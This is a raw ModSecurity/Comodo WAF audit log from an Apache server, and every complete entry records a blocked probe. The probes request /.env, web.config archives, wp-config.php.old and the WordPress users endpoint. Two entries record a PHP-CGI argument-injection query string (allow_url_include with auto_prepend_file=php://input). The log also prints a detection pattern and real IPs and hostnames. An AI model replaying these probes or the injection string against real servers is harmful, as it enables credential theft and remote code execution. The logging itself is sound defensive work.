Engine-Mode: "ENABLED" --068d3b12-Z-- --b7e7b666-A-- [22/Apr/2025:21:14:13 +0700] aAekNc0DNRaK3AYHswJb3AAAABg 103.236.140.4 39056 103.236.140.4 8181 --b7e7b666-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.168 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --b7e7b666-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7e7b666-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745331253139683 931 (- - -) Stopwatch2: 1745331253139683 931; combined=461, p1=342, p2=0, p3=0, p4=0, p5=119, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7e7b666-Z-- --fc44ba55-A-- [22/Apr/2025:21:22:08 +0700] aAemEM0DNRaK3AYHswJcQAAAAAs 103.236.140.4 40994 103.236.140.4 8181 --fc44ba55-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Accept-Charset: utf-8 --fc44ba55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc44ba55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745331728791381 734 (- - -) Stopwatch2: 1745331728791381 734; combined=295, p1=262, p2=0, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc44ba55-Z-- --69fa9f74-A-- [22/Apr/2025:21:52:01 +0700] aAetEc0DNRaK3AYHswJeIAAAABM 103.236.140.4 48240 103.236.140.4 8181 --69fa9f74-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 64.225.75.246 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --69fa9f74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69fa9f74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745333521024501 766 (- - -) Stopwatch2: 1745333521024501 766; combined=276, p1=242, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69fa9f74-Z-- --3dc02753-A-- [22/Apr/2025:23:01:29 +0700] aAe9WV9gRrTzIZGIAflv2gAAAIM 103.236.140.4 39866 103.236.140.4 8181 --3dc02753-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 68.183.180.73 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 68.183.180.73 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --3dc02753-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dc02753-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745337689524598 708 (- - -) Stopwatch2: 1745337689524598 708; combined=283, p1=247, p2=0, p3=0, p4=0, p5=36, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dc02753-Z-- --a9f8cc72-A-- [22/Apr/2025:23:19:51 +0700] aAfBpy3NG0xEq1F63-KCCAAAAEQ 103.236.140.4 44436 103.236.140.4 8181 --a9f8cc72-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 146.190.242.161 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 146.190.242.161 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a9f8cc72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9f8cc72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745338791499180 831 (- - -) Stopwatch2: 1745338791499180 831; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9f8cc72-Z-- --b01da02c-A-- [23/Apr/2025:00:33:00 +0700] aAfSzC3NG0xEq1F63-KGbAAAAFA 103.236.140.4 33454 103.236.140.4 8181 --b01da02c-B-- GET /web.config.zip HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 51.222.138.15 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 51.222.138.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --b01da02c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b01da02c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745343180532944 663 (- - -) Stopwatch2: 1745343180532944 663; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b01da02c-Z-- --83bc3c75-A-- [23/Apr/2025:00:33:14 +0700] aAfS2s0DNRaK3AYHswJqYAAAAAs 103.236.140.4 33542 103.236.140.4 8181 --83bc3c75-B-- GET /web.config.rar HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 51.222.138.15 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 51.222.138.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --83bc3c75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83bc3c75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745343194797269 750 (- - -) Stopwatch2: 1745343194797269 750; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83bc3c75-Z-- --c852667b-A-- [23/Apr/2025:00:33:29 +0700] aAfS6a3OiIHZ_gUDzTu7WQAAAM8 103.236.140.4 33626 103.236.140.4 8181 --c852667b-B-- GET /web.config.7z HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 51.222.138.15 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 51.222.138.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --c852667b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c852667b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745343209271477 696 (- - -) Stopwatch2: 1745343209271477 696; combined=292, p1=254, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c852667b-Z-- --7a8d9168-A-- [23/Apr/2025:00:33:43 +0700] aAfS9y3NG0xEq1F63-KGgwAAAE8 103.236.140.4 33710 103.236.140.4 8181 --7a8d9168-B-- GET /web.config.tar HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 51.222.138.15 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 51.222.138.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --7a8d9168-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a8d9168-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745343223882339 739 (- - -) Stopwatch2: 1745343223882339 739; combined=298, p1=260, p2=0, p3=0, p4=0, p5=38, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a8d9168-Z-- --5d369a62-A-- [23/Apr/2025:00:33:58 +0700] aAfTBq3OiIHZ_gUDzTu7XQAAAM4 103.236.140.4 33794 103.236.140.4 8181 --5d369a62-B-- GET /web.config.gz HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 51.222.138.15 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 51.222.138.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --5d369a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d369a62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745343238386916 799 (- - -) Stopwatch2: 1745343238386916 799; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d369a62-Z-- --ad737946-A-- [23/Apr/2025:01:55:38 +0700] aAfmKi3NG0xEq1F63-KL8gAAAFE 103.236.140.4 54896 103.236.140.4 8181 --ad737946-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.165.245 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.165.245 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --ad737946-C-- --ad737946-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad737946-E-- --ad737946-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745348138459513 5283 (- - -) Stopwatch2: 1745348138459513 5283; combined=3592, p1=490, p2=3064, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad737946-Z-- --a979844a-A-- [23/Apr/2025:02:43:32 +0700] aAfxZM0DNRaK3AYHswJ3JwAAABU 103.236.140.4 44922 103.236.140.4 8181 --a979844a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36 Accept-Charset: utf-8 --a979844a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a979844a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745351012846606 708 (- - -) Stopwatch2: 1745351012846606 708; combined=269, p1=240, p2=0, p3=0, p4=0, p5=28, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a979844a-Z-- --d18d8351-A-- [23/Apr/2025:02:46:31 +0700] aAfyFy3NG0xEq1F63-KUHgAAAEE 103.236.140.4 49494 103.236.140.4 8181 --d18d8351-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.70.2 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d18d8351-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d18d8351-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745351191650069 849 (- - -) Stopwatch2: 1745351191650069 849; combined=364, p1=324, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d18d8351-Z-- --8f91b279-A-- [23/Apr/2025:02:58:46 +0700] aAf09q3OiIHZ_gUDzTvQuQAAAM4 103.236.140.4 34892 103.236.140.4 8181 --8f91b279-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 112.74.57.225 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 112.74.57.225 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --8f91b279-C-- --8f91b279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f91b279-E-- --8f91b279-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745351926764581 5036 (- - -) Stopwatch2: 1745351926764581 5036; combined=3706, p1=464, p2=3207, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f91b279-Z-- --767fab11-A-- [23/Apr/2025:03:18:25 +0700] aAf5kV9gRrTzIZGIAfmHiQAAAJU 103.236.140.4 39638 103.236.140.4 8181 --767fab11-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.65.61 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.65.61 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --767fab11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --767fab11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745353105528546 737 (- - -) Stopwatch2: 1745353105528546 737; combined=307, p1=270, p2=0, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --767fab11-Z-- --8a8b7338-A-- [23/Apr/2025:03:57:12 +0700] aAgCqNIw_rqnm4P5_acyFAAAAE0 103.236.140.4 48976 103.236.140.4 8181 --8a8b7338-B-- GET /wp-config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 82.165.86.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.165.86.143 X-Forwarded-Proto: http Connection: close Accept: */* --8a8b7338-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a8b7338-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745355432214490 794 (- - -) Stopwatch2: 1745355432214490 794; combined=301, p1=260, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a8b7338-Z-- --5e2c0650-A-- [23/Apr/2025:04:09:25 +0700] aAgFhdIw_rqnm4P5_acy2QAAAEE 103.236.140.4 51924 103.236.140.4 8181 --5e2c0650-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --5e2c0650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e2c0650-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745356165986265 781 (- - -) Stopwatch2: 1745356165986265 781; combined=310, p1=271, p2=0, p3=0, p4=0, p5=38, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e2c0650-Z-- --abc1d218-A-- [23/Apr/2025:04:10:22 +0700] aAgFvhuwXEWV6ydgl53ogwAAAAo 103.236.140.4 52154 103.236.140.4 8181 --abc1d218-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 45.148.10.172 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36 Accept-Charset: utf-8 --abc1d218-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abc1d218-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745356222629014 1075 (- - -) Stopwatch2: 1745356222629014 1075; combined=534, p1=495, p2=0, p3=0, p4=0, p5=39, sr=166, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abc1d218-Z-- --377d3c00-A-- [23/Apr/2025:04:54:28 +0700] aAgQFD1ahuoJLEjKiAWrPwAAAI4 103.236.140.4 34600 103.236.140.4 8181 --377d3c00-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 168.63.153.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 168.63.153.176 X-Forwarded-Proto: http Connection: close Content-Type: text/html; charset=utf-8 --377d3c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --377d3c00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745358868670488 833 (- - -) Stopwatch2: 1745358868670488 833; combined=295, p1=255, p2=0, p3=0, p4=0, p5=39, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --377d3c00-Z-- --b1ea146f-A-- [23/Apr/2025:07:07:05 +0700] aAgvKBuwXEWV6ydgl530NQAAABA 103.236.140.4 37948 103.236.140.4 8181 --b1ea146f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.77.107.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.77.107.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.5 --b1ea146f-F-- HTTP/1.1 403 